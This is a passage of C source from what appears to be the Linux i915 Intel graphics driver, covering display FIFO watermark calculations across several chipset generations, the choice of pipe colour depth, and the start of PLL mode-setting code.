DRM_DEBUG_KMS("cursor watermark is too large(%d/%ld), disabling\n",
cursor_wm, cursor->max_wm);
return false;
}
if (!(display_wm || cursor_wm)) {
DRM_DEBUG_KMS("SR latency is 0, disabling\n");
return false;
}
return true;
}
static bool g4x_compute_srwm(struct drm_device *dev,
int plane,
int latency_ns,
const struct intel_watermark_params *display,
const struct intel_watermark_params *cursor,
int *display_wm, int *cursor_wm)
{
struct drm_crtc *crtc;
int hdisplay, htotal, pixel_size, clock;
unsigned long line_time_us;
int line_count, line_size;
int small, large;
int entries;
if (!latency_ns) {
*display_wm = *cursor_wm = 0;
return false;
}
crtc = intel_get_crtc_for_plane(dev, plane);
hdisplay = crtc->mode.hdisplay;
htotal = crtc->mode.htotal;
clock = crtc->mode.clock;
pixel_size = crtc->fb->bits_per_pixel / 8;
line_time_us = (htotal * 1000) / clock;
line_count = (latency_ns / line_time_us + 1000) / 1000;
line_size = hdisplay * pixel_size;
/* Use the minimum of the small and large buffer method for primary */
small = ((clock * pixel_size / 1000) * latency_ns) / 1000;
large = line_count * line_size;
entries = DIV_ROUND_UP(min(small, large), display->cacheline_size);
*display_wm = entries + display->guard_size;
/* calculate the self-refresh watermark for display cursor */
entries = line_count * pixel_size * 64;
entries = DIV_ROUND_UP(entries, cursor->cacheline_size);
*cursor_wm = entries + cursor->guard_size;
return g4x_check_srwm(dev,
*display_wm, *cursor_wm,
display, cursor);
}
#define single_plane_enabled(mask) is_power_of_2(mask)
static void g4x_update_wm(struct drm_device *dev)
{
static const int sr_latency_ns = 12000;
struct drm_i915_private *dev_priv = dev->dev_private;
int planea_wm, planeb_wm, cursora_wm, cursorb_wm;
int plane_sr, cursor_sr;
unsigned int enabled = 0;
if (g4x_compute_wm0(dev, 0,
&g4x_wm_info, latency_ns,
&g4x_cursor_wm_info, latency_ns,
&planea_wm, &cursora_wm))
enabled |= 1;
if (g4x_compute_wm0(dev, 1,
&g4x_wm_info, latency_ns,
&g4x_cursor_wm_info, latency_ns,
&planeb_wm, &cursorb_wm))
enabled |= 2;
plane_sr = cursor_sr = 0;
if (single_plane_enabled(enabled) &&
g4x_compute_srwm(dev, ffs(enabled) - 1,
sr_latency_ns,
&g4x_wm_info,
&g4x_cursor_wm_info,
&plane_sr, &cursor_sr))
I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN);
else
I915_WRITE(FW_BLC_SELF,
I915_READ(FW_BLC_SELF) & ~FW_BLC_SELF_EN);
DRM_DEBUG_KMS("Setting FIFO watermarks - A: plane=%d, cursor=%d, B: plane=%d, cursor=%d, SR: plane=%d, cursor=%d\n",
planea_wm, cursora_wm,
planeb_wm, cursorb_wm,
plane_sr, cursor_sr);
I915_WRITE(DSPFW1,
(plane_sr << DSPFW_SR_SHIFT) |
(cursorb_wm << DSPFW_CURSORB_SHIFT) |
(planeb_wm << DSPFW_PLANEB_SHIFT) |
planea_wm);
I915_WRITE(DSPFW2,
(I915_READ(DSPFW2) & DSPFW_CURSORA_MASK) |
(cursora_wm << DSPFW_CURSORA_SHIFT));
/* HPLL off in SR has some issues on G4x... disable it */
I915_WRITE(DSPFW3,
(I915_READ(DSPFW3) & ~DSPFW_HPLL_SR_EN) |
(cursor_sr << DSPFW_CURSOR_SR_SHIFT));
}
static void i965_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_crtc *crtc;
int srwm = 1;
int cursor_sr = 16;
/* Calc sr entries for one plane configs */
crtc = single_enabled_crtc(dev);
if (crtc) {
/* self-refresh has much higher latency */
static const int sr_latency_ns = 12000;
int clock = crtc->mode.clock;
int htotal = crtc->mode.htotal;
int hdisplay = crtc->mode.hdisplay;
int pixel_size = crtc->fb->bits_per_pixel / 8;
unsigned long line_time_us;
int entries;
line_time_us = ((htotal * 1000) / clock);
/* Use ns/us then divide to preserve precision */
entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
pixel_size * hdisplay;
entries = DIV_ROUND_UP(entries, I915_FIFO_LINE_SIZE);
srwm = I965_FIFO_SIZE - entries;
if (srwm < 0)
srwm = 1;
srwm &= 0x1ff;
DRM_DEBUG_KMS("self-refresh entries: %d, wm: %d\n",
entries, srwm);
entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
pixel_size * 64;
entries = DIV_ROUND_UP(entries,
i965_cursor_wm_info.cacheline_size);
cursor_sr = i965_cursor_wm_info.fifo_size -
(entries + i965_cursor_wm_info.guard_size);
if (cursor_sr > i965_cursor_wm_info.max_wm)
cursor_sr = i965_cursor_wm_info.max_wm;
DRM_DEBUG_KMS("self-refresh watermark: display plane %d "
"cursor %d\n", srwm, cursor_sr);
if (IS_CRESTLINE(dev))
I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN);
} else {
/* Turn off self refresh if both pipes are enabled */
if (IS_CRESTLINE(dev))
I915_WRITE(FW_BLC_SELF, I915_READ(FW_BLC_SELF)
& ~FW_BLC_SELF_EN);
}
DRM_DEBUG_KMS("Setting FIFO watermarks - A: 8, B: 8, C: 8, SR %d\n",
srwm);
/* 965 has limitations... */
I915_WRITE(DSPFW1, (srwm << DSPFW_SR_SHIFT) |
(8 << 16) | (8 << 8) | (8 << 0));
I915_WRITE(DSPFW2, (8 << 8) | (8 << 0));
/* update cursor SR watermark */
I915_WRITE(DSPFW3, (cursor_sr << DSPFW_CURSOR_SR_SHIFT));
}
static void i9xx_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
const struct intel_watermark_params *wm_info;
uint32_t fwater_lo;
uint32_t fwater_hi;
int cwm, srwm = 1;
int fifo_size;
int planea_wm, planeb_wm;
struct drm_crtc *crtc, *enabled = NULL;
if (IS_I945GM(dev))
wm_info = &i945_wm_info;
else if (!IS_GEN2(dev))
wm_info = &i915_wm_info;
else
wm_info = &i855_wm_info;
fifo_size = dev_priv->display.get_fifo_size(dev, 0);
crtc = intel_get_crtc_for_plane(dev, 0);
if (crtc->enabled && crtc->fb) {
planea_wm = intel_calculate_wm(crtc->mode.clock,
wm_info, fifo_size,
crtc->fb->bits_per_pixel / 8,
latency_ns);
enabled = crtc;
} else
planea_wm = fifo_size - wm_info->guard_size;
fifo_size = dev_priv->display.get_fifo_size(dev, 1);
crtc = intel_get_crtc_for_plane(dev, 1);
if (crtc->enabled && crtc->fb) {
planeb_wm = intel_calculate_wm(crtc->mode.clock,
wm_info, fifo_size,
crtc->fb->bits_per_pixel / 8,
latency_ns);
if (enabled == NULL)
enabled = crtc;
else
enabled = NULL;
} else
planeb_wm = fifo_size - wm_info->guard_size;
DRM_DEBUG_KMS("FIFO watermarks - A: %d, B: %d\n", planea_wm, planeb_wm);
/*
* Overlay gets an aggressive default since video jitter is bad.
*/
cwm = 2;
/* Play safe and disable self-refresh before adjusting watermarks. */
if (IS_I945G(dev) || IS_I945GM(dev))
I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN_MASK | 0);
else if (IS_I915GM(dev))
I915_WRITE(INSTPM, I915_READ(INSTPM) & ~INSTPM_SELF_EN);
/* Calc sr entries for one plane configs */
if (HAS_FW_BLC(dev) && enabled) {
/* self-refresh has much higher latency */
static const int sr_latency_ns = 6000;
int clock = enabled->mode.clock;
int htotal = enabled->mode.htotal;
int hdisplay = enabled->mode.hdisplay;
int pixel_size = enabled->fb->bits_per_pixel / 8;
unsigned long line_time_us;
int entries;
line_time_us = (htotal * 1000) / clock;
/* Use ns/us then divide to preserve precision */
entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
pixel_size * hdisplay;
entries = DIV_ROUND_UP(entries, wm_info->cacheline_size);
DRM_DEBUG_KMS("self-refresh entries: %d\n", entries);
srwm = wm_info->fifo_size - entries;
if (srwm < 0)
srwm = 1;
if (IS_I945G(dev) || IS_I945GM(dev))
I915_WRITE(FW_BLC_SELF,
FW_BLC_SELF_FIFO_MASK | (srwm & 0xff));
else if (IS_I915GM(dev))
I915_WRITE(FW_BLC_SELF, srwm & 0x3f);
}
DRM_DEBUG_KMS("Setting FIFO watermarks - A: %d, B: %d, C: %d, SR %d\n",
planea_wm, planeb_wm, cwm, srwm);
fwater_lo = ((planeb_wm & 0x3f) << 16) | (planea_wm & 0x3f);
fwater_hi = (cwm & 0x1f);
/* Set request length to 8 cachelines per fetch */
fwater_lo = fwater_lo | (1 << 24) | (1 << 8);
fwater_hi = fwater_hi | (1 << 8);
I915_WRITE(FW_BLC, fwater_lo);
I915_WRITE(FW_BLC2, fwater_hi);
if (HAS_FW_BLC(dev)) {
if (enabled) {
if (IS_I945G(dev) || IS_I945GM(dev))
I915_WRITE(FW_BLC_SELF,
FW_BLC_SELF_EN_MASK | FW_BLC_SELF_EN);
else if (IS_I915GM(dev))
I915_WRITE(INSTPM, I915_READ(INSTPM) | INSTPM_SELF_EN);
DRM_DEBUG_KMS("memory self refresh enabled\n");
} else
DRM_DEBUG_KMS("memory self refresh disabled\n");
}
}
static void i830_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_crtc *crtc;
uint32_t fwater_lo;
int planea_wm;
crtc = single_enabled_crtc(dev);
if (crtc == NULL)
return;
planea_wm = intel_calculate_wm(crtc->mode.clock, &i830_wm_info,
dev_priv->display.get_fifo_size(dev, 0),
crtc->fb->bits_per_pixel / 8,
latency_ns);
fwater_lo = I915_READ(FW_BLC) & ~0xfff;
fwater_lo |= (3<<8) | planea_wm;
DRM_DEBUG_KMS("Setting FIFO watermarks - A: %d\n", planea_wm);
I915_WRITE(FW_BLC, fwater_lo);
}
#define ILK_LP0_PLANE_LATENCY 700
#define ILK_LP0_CURSOR_LATENCY 1300
/*
* Check the wm result.
*
* If any calculated watermark values is larger than the maximum value that
* can be programmed into the associated watermark register, that watermark
* must be disabled.
*/
static bool ironlake_check_srwm(struct drm_device *dev, int level,
int fbc_wm, int display_wm, int cursor_wm,
const struct intel_watermark_params *display,
const struct intel_watermark_params *cursor)
{
struct drm_i915_private *dev_priv = dev->dev_private;
DRM_DEBUG_KMS("watermark %d: display plane %d, fbc lines %d,"
" cursor %d\n", level, display_wm, fbc_wm, cursor_wm);
if (fbc_wm > SNB_FBC_MAX_SRWM) {
DRM_DEBUG_KMS("fbc watermark(%d) is too large(%d), disabling wm%d+\n",
fbc_wm, SNB_FBC_MAX_SRWM, level);
/* fbc has it's own way to disable FBC WM */
I915_WRITE(DISP_ARB_CTL,
I915_READ(DISP_ARB_CTL) | DISP_FBC_WM_DIS);
return false;
}
if (display_wm > display->max_wm) {
DRM_DEBUG_KMS("display watermark(%d) is too large(%d), disabling wm%d+\n",
display_wm, SNB_DISPLAY_MAX_SRWM, level);
return false;
}
if (cursor_wm > cursor->max_wm) {
DRM_DEBUG_KMS("cursor watermark(%d) is too large(%d), disabling wm%d+\n",
cursor_wm, SNB_CURSOR_MAX_SRWM, level);
return false;
}
if (!(fbc_wm || display_wm || cursor_wm)) {
DRM_DEBUG_KMS("latency %d is 0, disabling wm%d+\n", level, level);
return false;
}
return true;
}
/*
* Compute watermark values of WM[1-3],
*/
static bool ironlake_compute_srwm(struct drm_device *dev, int level, int plane,
int latency_ns,
const struct intel_watermark_params *display,
const struct intel_watermark_params *cursor,
int *fbc_wm, int *display_wm, int *cursor_wm)
{
struct drm_crtc *crtc;
unsigned long line_time_us;
int hdisplay, htotal, pixel_size, clock;
int line_count, line_size;
int small, large;
int entries;
if (!latency_ns) {
*fbc_wm = *display_wm = *cursor_wm = 0;
return false;
}
crtc = intel_get_crtc_for_plane(dev, plane);
hdisplay = crtc->mode.hdisplay;
htotal = crtc->mode.htotal;
clock = crtc->mode.clock;
pixel_size = crtc->fb->bits_per_pixel / 8;
line_time_us = (htotal * 1000) / clock;
line_count = (latency_ns / line_time_us + 1000) / 1000;
line_size = hdisplay * pixel_size;
/* Use the minimum of the small and large buffer method for primary */
small = ((clock * pixel_size / 1000) * latency_ns) / 1000;
large = line_count * line_size;
entries = DIV_ROUND_UP(min(small, large), display->cacheline_size);
*display_wm = entries + display->guard_size;
/*
* Spec says:
* FBC WM = ((Final Primary WM * 64) / number of bytes per line) + 2
*/
*fbc_wm = DIV_ROUND_UP(*display_wm * 64, line_size) + 2;
/* calculate the self-refresh watermark for display cursor */
entries = line_count * pixel_size * 64;
entries = DIV_ROUND_UP(entries, cursor->cacheline_size);
*cursor_wm = entries + cursor->guard_size;
return ironlake_check_srwm(dev, level,
*fbc_wm, *display_wm, *cursor_wm,
display, cursor);
}
static void ironlake_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int fbc_wm, plane_wm, cursor_wm;
unsigned int enabled;
enabled = 0;
if (g4x_compute_wm0(dev, 0,
&ironlake_display_wm_info,
ILK_LP0_PLANE_LATENCY,
&ironlake_cursor_wm_info,
ILK_LP0_CURSOR_LATENCY,
&plane_wm, &cursor_wm)) {
I915_WRITE(WM0_PIPEA_ILK,
(plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
DRM_DEBUG_KMS("FIFO watermarks For pipe A -"
" plane %d, " "cursor: %d\n",
plane_wm, cursor_wm);
enabled |= 1;
}
if (g4x_compute_wm0(dev, 1,
&ironlake_display_wm_info,
ILK_LP0_PLANE_LATENCY,
&ironlake_cursor_wm_info,
ILK_LP0_CURSOR_LATENCY,
&plane_wm, &cursor_wm)) {
I915_WRITE(WM0_PIPEB_ILK,
(plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
DRM_DEBUG_KMS("FIFO watermarks For pipe B -"
" plane %d, cursor: %d\n",
plane_wm, cursor_wm);
enabled |= 2;
}
/*
* Calculate and update the self-refresh watermark only when one
* display plane is used.
*/
I915_WRITE(WM3_LP_ILK, 0);
I915_WRITE(WM2_LP_ILK, 0);
I915_WRITE(WM1_LP_ILK, 0);
if (!single_plane_enabled(enabled))
return;
enabled = ffs(enabled) - 1;
/* WM1 */
if (!ironlake_compute_srwm(dev, 1, enabled,
ILK_READ_WM1_LATENCY() * 500,
&ironlake_display_srwm_info,
&ironlake_cursor_srwm_info,
&fbc_wm, &plane_wm, &cursor_wm))
return;
I915_WRITE(WM1_LP_ILK,
WM1_LP_SR_EN |
(ILK_READ_WM1_LATENCY() << WM1_LP_LATENCY_SHIFT) |
(fbc_wm << WM1_LP_FBC_SHIFT) |
(plane_wm << WM1_LP_SR_SHIFT) |
cursor_wm);
/* WM2 */
if (!ironlake_compute_srwm(dev, 2, enabled,
ILK_READ_WM2_LATENCY() * 500,
&ironlake_display_srwm_info,
&ironlake_cursor_srwm_info,
&fbc_wm, &plane_wm, &cursor_wm))
return;
I915_WRITE(WM2_LP_ILK,
WM2_LP_EN |
(ILK_READ_WM2_LATENCY() << WM1_LP_LATENCY_SHIFT) |
(fbc_wm << WM1_LP_FBC_SHIFT) |
(plane_wm << WM1_LP_SR_SHIFT) |
cursor_wm);
/*
* WM3 is unsupported on ILK, probably because we don't have latency
* data for that power state
*/
}
static void sandybridge_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int latency = SNB_READ_WM0_LATENCY() * 100; /* In unit 0.1us */
int fbc_wm, plane_wm, cursor_wm;
unsigned int enabled;
enabled = 0;
if (g4x_compute_wm0(dev, 0,
&sandybridge_display_wm_info, latency,
&sandybridge_cursor_wm_info, latency,
&plane_wm, &cursor_wm)) {
I915_WRITE(WM0_PIPEA_ILK,
(plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
DRM_DEBUG_KMS("FIFO watermarks For pipe A -"
" plane %d, " "cursor: %d\n",
plane_wm, cursor_wm);
enabled |= 1;
}
if (g4x_compute_wm0(dev, 1,
&sandybridge_display_wm_info, latency,
&sandybridge_cursor_wm_info, latency,
&plane_wm, &cursor_wm)) {
I915_WRITE(WM0_PIPEB_ILK,
(plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
DRM_DEBUG_KMS("FIFO watermarks For pipe B -"
" plane %d, cursor: %d\n",
plane_wm, cursor_wm);
enabled |= 2;
}
/*
* Calculate and update the self-refresh watermark only when one
* display plane is used.
*
* SNB support 3 levels of watermark.
*
* WM1/WM2/WM2 watermarks have to be enabled in the ascending order,
* and disabled in the descending order
*
*/
I915_WRITE(WM3_LP_ILK, 0);
I915_WRITE(WM2_LP_ILK, 0);
I915_WRITE(WM1_LP_ILK, 0);
if (!single_plane_enabled(enabled))
return;
enabled = ffs(enabled) - 1;
/* WM1 */
if (!ironlake_compute_srwm(dev, 1, enabled,
SNB_READ_WM1_LATENCY() * 500,
&sandybridge_display_srwm_info,
&sandybridge_cursor_srwm_info,
&fbc_wm, &plane_wm, &cursor_wm))
return;
I915_WRITE(WM1_LP_ILK,
WM1_LP_SR_EN |
(SNB_READ_WM1_LATENCY() << WM1_LP_LATENCY_SHIFT) |
(fbc_wm << WM1_LP_FBC_SHIFT) |
(plane_wm << WM1_LP_SR_SHIFT) |
cursor_wm);
/* WM2 */
if (!ironlake_compute_srwm(dev, 2, enabled,
SNB_READ_WM2_LATENCY() * 500,
&sandybridge_display_srwm_info,
&sandybridge_cursor_srwm_info,
&fbc_wm, &plane_wm, &cursor_wm))
return;
I915_WRITE(WM2_LP_ILK,
WM2_LP_EN |
(SNB_READ_WM2_LATENCY() << WM1_LP_LATENCY_SHIFT) |
(fbc_wm << WM1_LP_FBC_SHIFT) |
(plane_wm << WM1_LP_SR_SHIFT) |
cursor_wm);
/* WM3 */
if (!ironlake_compute_srwm(dev, 3, enabled,
SNB_READ_WM3_LATENCY() * 500,
&sandybridge_display_srwm_info,
&sandybridge_cursor_srwm_info,
&fbc_wm, &plane_wm, &cursor_wm))
return;
I915_WRITE(WM3_LP_ILK,
WM3_LP_EN |
(SNB_READ_WM3_LATENCY() << WM1_LP_LATENCY_SHIFT) |
(fbc_wm << WM1_LP_FBC_SHIFT) |
(plane_wm << WM1_LP_SR_SHIFT) |
cursor_wm);
}
/**
* intel_update_watermarks - update FIFO watermark values based on current modes
*
* Calculate watermark values for the various WM regs based on current mode
* and plane configuration.
*
* There are several cases to deal with here:
* - normal (i.e. non-self-refresh)
* - self-refresh (SR) mode
* - lines are large relative to FIFO size (buffer can hold up to 2)
* - lines are small relative to FIFO size (buffer can hold more than 2
* lines), so need to account for TLB latency
*
* The normal calculation is:
* watermark = dotclock * bytes per pixel * latency
* where latency is platform & configuration dependent (we assume pessimal
* values here).
*
* The SR calculation is:
* watermark = (trunc(latency/line time)+1) * surface width *
* bytes per pixel
* where
* line time = htotal / dotclock
* surface width = hdisplay for normal plane and 64 for cursor
* and latency is assumed to be high, as above.
*
* The final value programmed to the register should always be rounded up,
* and include an extra 2 entries to account for clock crossings.
*
* We don't use the sprite, so we can ignore that. And on Crestline we have
* to set the non-SR watermarks to 8.
*/
static void intel_update_watermarks(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (dev_priv->display.update_wm)
dev_priv->display.update_wm(dev);
}
static inline bool intel_panel_use_ssc(struct drm_i915_private *dev_priv)
{
return dev_priv->lvds_use_ssc && i915_panel_use_ssc
&& !(dev_priv->quirks & QUIRK_LVDS_SSC_DISABLE);
}
/**
* intel_choose_pipe_bpp_dither - figure out what color depth the pipe should send
* @crtc: CRTC structure
*
* A pipe may be connected to one or more outputs. Based on the depth of the
* attached framebuffer, choose a good color depth to use on the pipe.
*
* If possible, match the pipe depth to the fb depth. In some cases, this
* isn't ideal, because the connected output supports a lesser or restricted
* set of depths. Resolve that here:
* LVDS typically supports only 6bpc, so clamp down in that case
* HDMI supports only 8bpc or 12bpc, so clamp to 8bpc with dither for 10bpc
* Displays may support a restricted set as well, check EDID and clamp as
* appropriate.
*
* RETURNS:
* Dithering requirement (i.e. false if display bpc and pipe bpc match,
* true if they don't match).
*/
static bool intel_choose_pipe_bpp_dither(struct drm_crtc *crtc,
unsigned int *pipe_bpp)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_encoder *encoder;
struct drm_connector *connector;
unsigned int display_bpc = UINT_MAX, bpc;
/* Walk the encoders & connectors on this crtc, get min bpc */
list_for_each_entry(encoder, &dev->mode_config.encoder_list, head) {
struct intel_encoder *intel_encoder = to_intel_encoder(encoder);
if (encoder->crtc != crtc)
continue;
if (intel_encoder->type == INTEL_OUTPUT_LVDS) {
unsigned int lvds_bpc;
if ((I915_READ(PCH_LVDS) & LVDS_A3_POWER_MASK) ==
LVDS_A3_POWER_UP)
lvds_bpc = 8;
else
lvds_bpc = 6;
if (lvds_bpc < display_bpc) {
DRM_DEBUG_DRIVER("clamping display bpc (was %d) to LVDS (%d)\n", display_bpc, lvds_bpc);
display_bpc = lvds_bpc;
}
continue;
}
if (intel_encoder->type == INTEL_OUTPUT_EDP) {
/* Use VBT settings if we have an eDP panel */
unsigned int edp_bpc = dev_priv->edp.bpp / 3;
if (edp_bpc < display_bpc) {
DRM_DEBUG_DRIVER("clamping display bpc (was %d) to eDP (%d)\n", display_bpc, edp_bpc);
display_bpc = edp_bpc;
}
continue;
}
/* Not one of the known troublemakers, check the EDID */
list_for_each_entry(connector, &dev->mode_config.connector_list,
head) {
if (connector->encoder != encoder)
continue;
/* Don't use an invalid EDID bpc value */
if (connector->display_info.bpc &&
connector->display_info.bpc < display_bpc) {
DRM_DEBUG_DRIVER("clamping display bpc (was %d) to EDID reported max of %d\n", display_bpc, connector->display_info.bpc);
display_bpc = connector->display_info.bpc;
}
}
/*
* HDMI is either 12 or 8, so if the display lets 10bpc sneak
* through, clamp it down. (Note: >12bpc will be caught below.)
*/
if (intel_encoder->type == INTEL_OUTPUT_HDMI) {
if (display_bpc > 8 && display_bpc < 12) {
DRM_DEBUG_DRIVER("forcing bpc to 12 for HDMI\n");
display_bpc = 12;
} else {
DRM_DEBUG_DRIVER("forcing bpc to 8 for HDMI\n");
display_bpc = 8;
}
}
}
/*
* We could just drive the pipe at the highest bpc all the time and
* enable dithering as needed, but that costs bandwidth. So choose
* the minimum value that expresses the full color range of the fb but
* also stays within the max display bpc discovered above.
*/
switch (crtc->fb->depth) {
case 8:
bpc = 8; /* since we go through a colormap */
break;
case 15:
case 16:
bpc = 6; /* min is 18bpp */
break;
case 24:
bpc = 8;
break;
case 30:
bpc = 10;
break;
case 48:
bpc = 12;
break;
default:
DRM_DEBUG("unsupported depth, assuming 24 bits\n");
bpc = min((unsigned int)8, display_bpc);
break;
}
display_bpc = min(display_bpc, bpc);
DRM_DEBUG_DRIVER("setting pipe bpc to %d (max display bpc %d)\n",
bpc, display_bpc);
*pipe_bpp = display_bpc * 3;
return display_bpc != bpc;
}
static int i9xx_crtc_mode_set(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode,
int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
int refclk, num_connectors = 0;
intel_clock_t clock, reduced_clock;
u32 dpll, fp = 0, fp2 = 0, dspcntr, pipeconf;
bool ok, has_reduced_clock = false, is_sdvo = false, is_dvo = false;
bool is_crt = false, is_lvds = false, is_tv = false, is_dp = false;
struct drm_mode_config *mode_config = &dev->mode_config;
struct intel_encoder *encoder;
const intel_limit_t *limit;
int ret;
u32 temp;
u32 lvds_sync = 0;
list_for_each_entry(encoder, &mode_config->encoder_list, base.head) {
if (encoder->base.crtc != crtc)
continue;
switch (encoder->type) {
case INTEL_OUTPUT_LVDS:
is_lvds = true;
break;
case INTEL_OUTPUT_SDVO:
case INTEL_OUTPUT_HDMI:
is_sdvo = true;
if (encoder->needs_tv_clock)
is_tv = true;
break;
case INTEL_OUTPUT_DVO:
is_dvo = true;
break;
case INTEL_OUTPUT_TVOUT:
is_tv = true;
break;
case INTEL_OUTPUT_ANALOG:
is_crt = true;
break;
case INTEL_OUTPUT_DISPLAYPORT:
is_dp = true;
break;
}
num_connectors++;
}
if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2) {
refclk = dev_priv->lvds_ssc_freq * 1000;
DRM_DEBUG_KMS("using SSC reference clock of %d MHz\n",
refclk / 1000);
} else if (!IS_GEN2(dev)) {
refclk = 96000;
} else {
refclk = 48000;
}
/*
* Returns a set of divisors for the desired target clock with the given
* refclk, or FALSE. The returned values represent the clock equation:
* reflck * (5 * (m1 + 2) + (m2 + 2)) / (n + 2) / p1 / p2.
*/
limit = intel_limit(crtc, refclk);
ok = limit->find_pll(limit, crtc, adjusted_mode->clock, refclk, &clock);
if (!ok) {
DRM_ERROR("Couldn't find PLL settings for mode!\n");
return -EINVAL;
}
/* Ensure that the cursor is valid for the new mode before changing... */
intel_crtc_update_cursor(crtc, true);
if (is_lvds && dev_priv->lvds_downclock_avail) {
has_reduced_clock = limit->find_pll(limit, crtc,
dev_priv->lvds_downclock,
refclk,
&reduced_clock);
if (has_reduced_clock && (clock.p != reduced_clock.p)) {
/*
* If the different P is found, it means that we can't
* switch the display clock by using the FP0/FP1.
* In such case we will disable the LVDS downclock
* feature.
*/
DRM_DEBUG_KMS("Different P is found for "
"LVDS clock/downclock\n");
has_reduced_clock = 0;
}
}
/* SDVO TV has fixed PLL values depend on its clock range,
this mirrors vbios setting. */
if (is_sdvo && is_tv) {
if (adjusted_mode->clock >= 100000
&& adjusted_mode->clock < 140500) {
clock.p1 = 2;
clock.p2 = 10;
clock.n = 3;
clock.m1 = 16;
clock.m2 = 8;
} else if (adjusted_mode->clock >= 140500
&& adjusted_mode->clock <= 200000) {
clock.p1 = 1;
clock.p2 = 10;
clock.n = 6;
clock.m1 = 12;
clock.m2 = 8;
}
}
if (IS_PINEVIEW(dev)) {
fp = (1 << clock.n) << 16 | clock.m1 << 8 | clock.m2;
if (has_reduced_clock)
fp2 = (1 << reduced_clock.n) << 16 |
reduced_clock.m1 << 8 | reduced_clock.m2;
} else {
fp = clock.n << 16 | clock.m1 << 8 | clock.m2;
if (has_reduced_clock)
fp2 = reduced_clock.n << 16 | reduced_clock.m1 << 8 |
reduced_clock.m2;
}
dpll = DPLL_VGA_MODE_DIS;
if (!IS_GEN2(dev)) {
if (is_lvds)
dpll |= DPLLB_MODE_LVDS;
else
dpll |= DPLLB_MODE_DAC_SERIAL;
if (is_sdvo) {
int pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
if (pixel_multiplier > 1) {
if (IS_I945G(dev) || IS_I945GM(dev) || IS_G33(dev))
dpll |= (pixel_multiplier - 1) << SDVO_MULTIPLIER_SHIFT_HIRES;
}
dpll |= DPLL_DVO_HIGH_SPEED;
}
if (is_dp)
dpll |= DPLL_DVO_HIGH_SPEED;
/* compute bitmask from p1 value */
if (IS_PINEVIEW(dev))
dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT_PINEVIEW;
else {
dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
if (IS_G4X(dev) && has_reduced_clock)
dpll |= (1 << (reduced_clock.p1 - 1)) << DPLL_FPA1_P1_POST_DIV_SHIFT;
}
switch (clock.p2) {
case 5:
dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_5;
break;
case 7:
dpll |= DPLLB_LVDS_P2_CLOCK_DIV_7;
break;
case 10:
dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_10;
break;
case 14:
dpll |= DPLLB_LVDS_P2_CLOCK_DIV_14;
break;
}
if (INTEL_INFO(dev)->gen >= 4)
dpll |= (6 << PLL_LOAD_PULSE_PHASE_SHIFT);
} else {
if (is_lvds) {
dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
} else {
if (clock.p1 == 2)
dpll |= PLL_P1_DIVIDE_BY_TWO;
else
dpll |= (clock.p1 - 2) << DPLL_FPA01_P1_POST_DIV_SHIFT;
if (clock.p2 == 4)
dpll |= PLL_P2_DIVIDE_BY_4;
}
}
if (is_sdvo && is_tv)
dpll |= PLL_REF_INPUT_TVCLKINBC;
else if (is_tv)
/* XXX: just matching BIOS for now */
/* dpll |= PLL_REF_INPUT_TVCLKINBC; */
dpll |= 3;
else if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2)
dpll |= PLLB_REF_INPUT_SPREADSPECTRUMIN;
else
dpll |= PLL_REF_INPUT_DREFCLK;
/* setup pipeconf */
pipeconf = I915_READ(PIPECONF(pipe));
/* Set up the display plane register */
dspcntr = DISPPLANE_GAMMA_ENABLE;
/* Ironlake's plane is forced to pipe, bit 24 is to
enable color space conversion */
if (pipe == 0)
dspcntr &= ~DISPPLANE_SEL_PIPE_MASK;
else
dspcntr |= DISPPLANE_SEL_PIPE_B;
if (pipe == 0 && INTEL_INFO(dev)->gen < 4) {
/* Enable pixel doubling when the dot clock is > 90% of the (display)
* core speed.
*
* XXX: No double-wide on 915GM pipe B. Is that the only reason for the
* pipe == 0 check?
*/
if (mode->clock >
dev_priv->display.get_display_clock_speed(dev) * 9 / 10)
pipeconf |= PIPECONF_DOUBLE_WIDE;
else
pipeconf &= ~PIPECONF_DOUBLE_WIDE;
}
dpll |= DPLL_VCO_ENABLE;
DRM_DEBUG_KMS("Mode for pipe %c:\n", pipe == 0 ? 'A' : 'B');
drm_mode_debug_printmodeline(mode);
I915_WRITE(FP0(pipe), fp);
I915_WRITE(DPLL(pipe), dpll & ~DPLL_VCO_ENABLE);
POSTING_READ(DPLL(pipe));
udelay(150);
/* The LVDS pin pair needs to be on before the DPLLs are enabled.
* This is an exception to the general rule that mode_set doesn't turn
* things on.
*/
if (is_lvds) {
temp = I915_READ(LVDS);
